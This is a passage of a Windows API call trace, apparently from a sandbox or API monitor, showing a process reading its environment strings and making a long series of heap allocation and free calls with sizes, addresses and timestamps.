0x554870 [0192.994] GetEnvironmentStringsW () returned 0x568110* [0192.994] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1254, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1254 [0192.994] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x4e6) returned 0x568af0 [0192.994] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1254, lpMultiByteStr=0x568af0, cbMultiByte=1254, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 1254 [0192.994] FreeEnvironmentStringsW (penv=0x568110) returned 1 [0192.994] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x118) returned 0x55a480 [0192.994] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x1f) returned 0x55b5d0 [0192.994] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x2e) returned 0x554fb0 [0192.995] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x31) returned 0x554ff0 [0192.995] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x3c) returned 0x5604b0 [0192.995] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x31) returned 0x555030 [0192.995] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x14) returned 0x555070 [0192.995] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x24) returned 0x55b840 [0192.995] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0xd) returned 0x553ce0 [0192.995] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x1d) returned 0x55b780 [0192.995] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x31) returned 0x553ed0 [0192.995] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x15) returned 0x5540a0 [0192.995] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x17) returned 0x552600 [0192.995] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0xe) returned 0x553f10 [0192.995] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x69) returned 0x553f30 [0192.995] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x3e) returned 0x560be0 [0192.995] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x1d) returned 0x55b900 [0192.995] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x48) returned 0x560e10 [0192.995] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x12) returned 0x55ba30 [0192.995] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x18) returned 0x55ba50 [0192.995] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x1b) returned 0x55b6f0 [0192.995] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x1e) returned 0x55b7b0 [0192.995] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x29) returned 0x5681a0 [0192.995] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x1e) returned 0x55b750 [0192.995] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x6b) returned 0x55ba70 [0192.995] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x17) returned 0x55baf0 [0192.996] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0xf) returned 0x558d10 [0192.996] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x16) returned 0x558d30 [0192.996] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x2a) returned 0x568320 [0192.996] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x29) returned 0x568360 [0192.996] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x12) returned 0x5693b0 [0192.996] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x21) returned 0x55b9f0 [0192.996] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x16) returned 0x569310 [0192.996] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x22) returned 0x55b810 [0192.996] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x12) returned 0x569170 [0192.996] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x568af0 | out: hHeap=0x550000) returned 1 [0192.996] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0xa3a7) returned 0x5693f0 [0192.999] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x20) returned 0x55b960 [0192.999] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0xa3a7) returned 0x5737a0 [0193.001] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x5693f0 | out: hHeap=0x550000) returned 1 [0193.001] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0xfef7) returned 0x57db50 [0193.005] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x40) returned 0x560b90 [0193.005] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0xfef7) returned 0x58da50 [0193.007] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x55b960 | out: hHeap=0x550000) returned 1 [0193.007] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x57db50 | out: hHeap=0x550000) returned 1 [0193.008] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x450) returned 0x568920 [0193.008] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x450) returned 0x59d950 [0193.008] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x568920 | out: hHeap=0x550000) returned 1 [0193.008] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x1ea7) returned 0x59ddb0 [0193.009] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0xf40) returned 0x5693f0 [0193.009] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x7a0) returned 0x56a340 [0193.010] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x59ddb0 | out: hHeap=0x550000) returned 1 [0193.010] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x5693f0 | out: hHeap=0x550000) returned 1 [0193.010] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0xbf0) returned 0x5693f0 [0193.010] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x59d950 | out: hHeap=0x550000) returned 1 [0193.010] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x56a340 | out: hHeap=0x550000) returned 1 [0193.010] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x640) returned 0x568920 [0193.010] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x1247) returned 0x59d950 [0193.010] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x5693f0 | out: hHeap=0x550000) returned 1 [0193.010] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x568920 | out: hHeap=0x550000) returned 1 [0193.010] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x520) returned 0x568920 [0193.010] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x1b56) returned 0x5693f0 [0193.010] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x59d950 | out: hHeap=0x550000) returned 1 [0193.010] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x568920 | out: hHeap=0x550000) returned 1 [0193.010] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x8a0) returned 0x59d950 [0193.010] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x28ed) returned 0x56af50 [0193.010] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x5693f0 | out: hHeap=0x550000) returned 1 [0193.010] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x59d950 | out: hHeap=0x550000) returned 1 [0193.010] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x550) returned 0x568920 [0193.010] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x568920 | out: hHeap=0x550000) returned 1 [0193.011] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x2537) returned 0x59d950 [0193.011] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x12b7) returned 0x5693f0 [0193.011] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x950) returned 0x56d850 [0193.011] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x59d950 | out: hHeap=0x550000) returned 1 [0193.011] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x5693f0 | out: hHeap=0x550000) returned 1 [0193.011] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x3d4f) returned 0x56e1b0 [0193.012] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x56af50 | out: hHeap=0x550000) returned 1 [0193.012] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x56d850 | out: hHeap=0x550000) returned 1 [0193.012] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x2377) returned 0x59d950 [0193.012] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x11d7) returned 0x571f10 [0193.013] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x8e0) returned 0x5693f0 [0193.013] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x59d950 | out: hHeap=0x550000) returned 1 [0193.013] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x571f10 | out: hHeap=0x550000) returned 1 [0193.013] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x5693f0 | out: hHeap=0x550000) returned 1 [0193.013] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x5b0) returned 0x568920 [0193.014] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x568920 | out: hHeap=0x550000) returned 1 [0193.014] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x640) returned 0x568920 [0193.014] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x5be2) returned 0x57db50 [0193.015] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x56e1b0 | out: hHeap=0x550000) returned 1 [0193.015] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x568920 | out: hHeap=0x550000) returned 1 [0193.015] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x890) returned 0x59d950 [0193.015] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x59d950 | out: hHeap=0x550000) returned 1 [0193.015] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0xac0) returned 0x59d950 [0193.015] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x59d950 | out: hHeap=0x550000) returned 1 [0193.015] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x20) returned 0x55b870 [0193.015] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x960) returned 0x59d950 [0193.015] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x960) returned 0x59e2c0 [0193.015] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x59d950 | out: hHeap=0x550000) returned 1 [0193.015] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x460) returned 0x568920 [0193.015] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0xe0f) returned 0x59ec30 [0193.015] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x59e2c0 | out: hHeap=0x550000) returned 1 [0193.015] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x568920 | out: hHeap=0x550000) returned 1 [0193.015] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x1c17) returned 0x583740 [0193.016] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0xe00) returned 0x59d950 [0193.016] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x700) returned 0x585360 [0193.016] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x583740 | out: hHeap=0x550000) returned 1 [0193.016] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x59d950 | out: hHeap=0x550000) returned 1 [0193.016] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x153d) returned 0x583740 [0193.016] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x59ec30 | out: hHeap=0x550000) returned 1 [0193.016] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x585360 | out: hHeap=0x550000) returned 1 [0193.016] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x2277) returned 0x59d950 [0193.016] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x1157) returned 0x584c90 [0193.017] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x8a0) returned 0x585df0 [0193.017] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x59d950 | out: hHeap=0x550000) returned 1 [0193.017] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x584c90 | out: hHeap=0x550000) returned 1 [0193.017] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x1fc7) returned 0x59d950 [0193.017] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x583740 | out: hHeap=0x550000) returned 1 [0193.017] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x585df0 | out: hHeap=0x550000) returned 1 [0193.017] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x1657) returned 0x583740 [0193.017] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0xb20) returned 0x584da0 [0193.018] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x590) returned 0x59f920 [0193.018] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x583740 | out: hHeap=0x550000) returned 1 [0193.018] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x584da0 | out: hHeap=0x550000) returned 1 [0193.018] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x2f96) returned 0x583740 [0193.018] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x59d950 | out: hHeap=0x550000) returned 1 [0193.018] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x59f920 | out: hHeap=0x550000) returned 1 [0193.018] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x2b47) returned 0x5866e0 [0193.018] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x15b7) returned 0x59d950 [0193.019] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0xad0) returned 0x59ef10 [0193.019] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x5866e0 | out: hHeap=0x550000) returned 1 [0193.019] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x59d950 | out: hHeap=0x550000) returned 1 [0193.019] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x59ef10 | out: hHeap=0x550000) returned 1 [0193.019] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x2697) returned 0x5866e0 [0193.019] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x1367) returned 0x59d950 [0193.020] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x9a0) returned 0x59ecc0 [0193.020] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x5866e0 | out: hHeap=0x550000) returned 1 [0193.020] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x59d950 | out: hHeap=0x550000) returned 1 [0193.020] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x474d) returned 0x5866e0 [0193.021] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x583740 | out: hHeap=0x550000) returned 1 [0193.021] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x59ecc0 | out: hHeap=0x550000) returned 1 [0193.021] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x920) returned 0x59d950 [0193.021] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x59d950 | out: hHeap=0x550000) returned 1 [0193.021] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x1b47) returned 0x59d950 [0193.021] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0xd90) returned 0x58ae40 [0193.021] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x6d0) returned 0x59f4a0 [0193.021] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x59d950 | out: hHeap=0x550000) returned 1 [0193.021] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x58ae40 | out: hHeap=0x550000) returned 1 [0193.022] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x59f4a0 | out: hHeap=0x550000) returned 1 [0193.022] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x5d0) returned 0x568920 [0193.022] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x6adf) returned 0x5693f0 [0193.022] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x5866e0 | out: hHeap=0x550000) returned 1 [0193.022] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x568920 | out: hHeap=0x550000) returned 1 [0193.022] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x1887) returned 0x59d950 [0193.022] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0xc30) returned 0x59f1e0 [0193.022] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x620) returned 0x568920 [0193.023] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x59d950 | out: hHeap=0x550000) returned 1 [0193.023] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x59f1e0 | out: hHeap=0x550000) returned 1 [0193.023] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x568920 | out: hHeap=0x550000) returned 1 [0193.023] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x8f0) returned 0x59d950 [0193.023] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x480) returned 0x568920 [0193.023] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x240) returned 0x59e250 [0193.023] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x59d950 | out: hHeap=0x550000) returned 1 [0193.023] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x568920 | out: hHeap=0x550000) returned 1 [0193.023] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x59e250 | out: hHeap=0x550000) returned 1 [0193.023] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x40) returned 0x560d20 [0193.023] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x55b870 | out: hHeap=0x550000) returned 1 [0193.023] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x57db50 | out: hHeap=0x550000) returned 1 [0193.024] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x5693f0 | out: hHeap=0x550000) returned 1 [0193.025] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x560d20 | out: hHeap=0x550000) returned 1 [0193.025] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x9900) returned 0x5693f0 [0193.026] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x1bf0) returned 0x59d950 [0193.223] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x59d950 | out: hHeap=0x550000) returned 1 [0193.223] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x9937) returned 0x57db50 [0193.224] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x5693f0 | out: hHeap=0x550000) returned 1 [0193.224] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x20) returned 0x55b2a0 [0193.224] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x9900) returned 0x5693f0 [0193.224] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x1bf0) returned 0x59d950 [0193.225] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x59d950 | out: hHeap=0x550000) returned 1 [0193.225] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x9937) returned 0x59d950 [0193.226] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x5693f0 | out: hHeap=0x550000) returned 1 [0193.226] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x40) returned 0x560820 [0193.227] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x55b2a0 | out: hHeap=0x550000) returned 1 [0193.227] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x5737a0 | out: hHeap=0x550000) returned 1 [0193.227] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x58da50 | out: hHeap=0x550000) returned 1 [0193.227] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x560b90 | out: hHeap=0x550000) returned 1 [0193.227] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x5693f0 [0193.227] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x587490 [0193.227] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x8) returned 0x558d50 [0193.228] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x5a7290 [0193.228] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x10) returned 0x569030 [0193.228] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x558d50 | out: hHeap=0x550000) returned 1 [0193.228] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x5ba4a0 [0193.229] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x18) returned 0x569290 [0193.229] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x569030 | out: hHeap=0x550000) returned 1 [0193.229] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x5cd6b0 [0193.229] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x20) returned 0x55b870 [0193.229] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x569290 | out: hHeap=0x550000) returned 1 [0193.229] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x5e08c0 [0193.230] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x30) returned 0x568220 [0193.230] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x55b870 | out: hHeap=0x550000) returned 1 [0193.230] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x5f3ad0 [0193.230] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x606ce0 [0193.231] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x48) returned 0x560870 [0193.231] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x568220 | out: hHeap=0x550000) returned 1 [0193.231] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x619ef0 [0193.231] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x62d100 [0193.232] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x1e70080 [0193.233] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x68) returned 0x558d50 [0193.233] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x560870 | out: hHeap=0x550000) returned 1 [0193.233] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x1e83290 [0193.233] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x1e964a0 [0193.234] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x1ea96b0 [0193.234] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x1ebc8c0 [0193.235] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x98) returned 0x5550c0 [0193.235] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x558d50 | out: hHeap=0x550000) returned 1 [0193.235] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x1ecfad0 [0193.235] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x1ee2ce0 [0193.236] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x1ef5ef0 [0193.236] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x1f09100 [0193.237] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x1f1c310 [0193.237] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x1f2f520 [0193.238] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0xe0) returned 0x554cf0 [0193.238] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x5550c0 | out: hHeap=0x550000) returned 1 [0193.238] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x1f42730 [0193.238] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2010080 [0193.239] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2023290 [0193.240] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x20364a0 [0193.240] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x20496b0 [0193.242] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x205c8c0 [0193.243] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x206fad0 [0193.243] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2082ce0 [0193.244] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2095ef0 [0193.245] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x150) returned 0x55b0c0 [0193.245] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x554cf0 | out: hHeap=0x550000) returned 1 [0193.245] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x20a9100 [0193.246] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x20bc310 [0193.246] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x20cf520 [0193.247] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x20e2730 [0193.248] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x20f5940 [0193.248] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2108b50 [0193.249] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x211bd60 [0193.250] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x212ef70 [0193.252] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2142180 [0193.253] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2155390 [0193.253] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x21685a0 [0193.254] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x217b7b0 [0193.255] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x218e9c0 [0193.255] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x21a1bd0 [0193.255] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x1f8) returned 0x568920 [0193.255] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x55b0c0 | out: hHeap=0x550000) returned 1 [0193.255] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x21b4de0 [0193.256] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x21c7ff0 [0193.256] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x21db200 